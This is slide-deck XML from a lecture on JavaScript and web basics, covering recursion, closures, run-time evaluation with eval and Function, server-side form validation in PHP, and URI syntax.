              <a:t>']);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19561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8 at 8.3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900"/>
            <a:ext cx="9144000" cy="3883878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181330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 Recursion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> factorial(n) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (n === 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    }</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n * factorial(n - 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(factorial(5));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>120</a:t>
            </a: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/wiki/JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63142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 Anonymous Functions and Closures</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err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>createFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> count = 0;</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ++count;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>createFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> inc2 = createFunction();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc2();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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/wiki/JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158460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8 at 9.0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900"/>
            <a:ext cx="9144000" cy="4132017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14600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 Run-Time Evaluation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript contains features to interpret a string as code and execute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setInterval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo = "bar";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("foo = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>';");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(foo);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> x = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('hello');";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test = new Function(x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16080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9.36.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0"/>
            <a:ext cx="9144000" cy="2521902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86361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Uses – Form Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to validate user input on HTML forms?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traditionally requires a round-trip to the server, where the server can check the input to make sure that it is valid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213149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Uses – Form Validation</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en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if ($_GET['submit']) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   $student = $_GET['student'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   $class = $_GET['class'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   $grade = $_GET['grade'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   if (empty($student) || empty($class) || empty($grade)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  echo "&lt;b&gt;Error, did not fill out all the forms&lt;/b&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   else if (!($grade == 'A' || $grade == 'B' || $grade == 'C' || </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                 $grade == 'D' || $grade == 'F')) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  echo "&lt;b&gt;Error, grade must be one of A, B, C, D, or F&lt;/b&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  echo "&lt;b&gt;Grade successfully submitted!&lt;/b&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  Student: &lt;input type="text" name="student"&gt;&lt;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Class:  &lt;input type="text" name="class"&gt;&lt;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Grade:  &lt;input type="text" name="grade"&gt;&lt;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&lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180537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09.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2036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Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;scheme&gt;:&lt;authority&gt;/&lt;path&gt;?&lt;query&gt;#&lt;fragment&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>scheme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>The protocol to use to request the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>The entity that controls the interpretation of the rest of the URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Usually a server name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>&lt;username&gt;@&lt;host&gt;:&lt;port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Usually a hierarchical pathname composed of “/” separated strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Used to pass non-hierarchical data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>fragment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Used to identify a subsection or subresource of the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20313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09.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2001136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2.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3564152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3.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7320257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3.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0163653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14.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9673411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14.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8438" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16513658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6071" y="760287"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1035821"/>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1183707"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
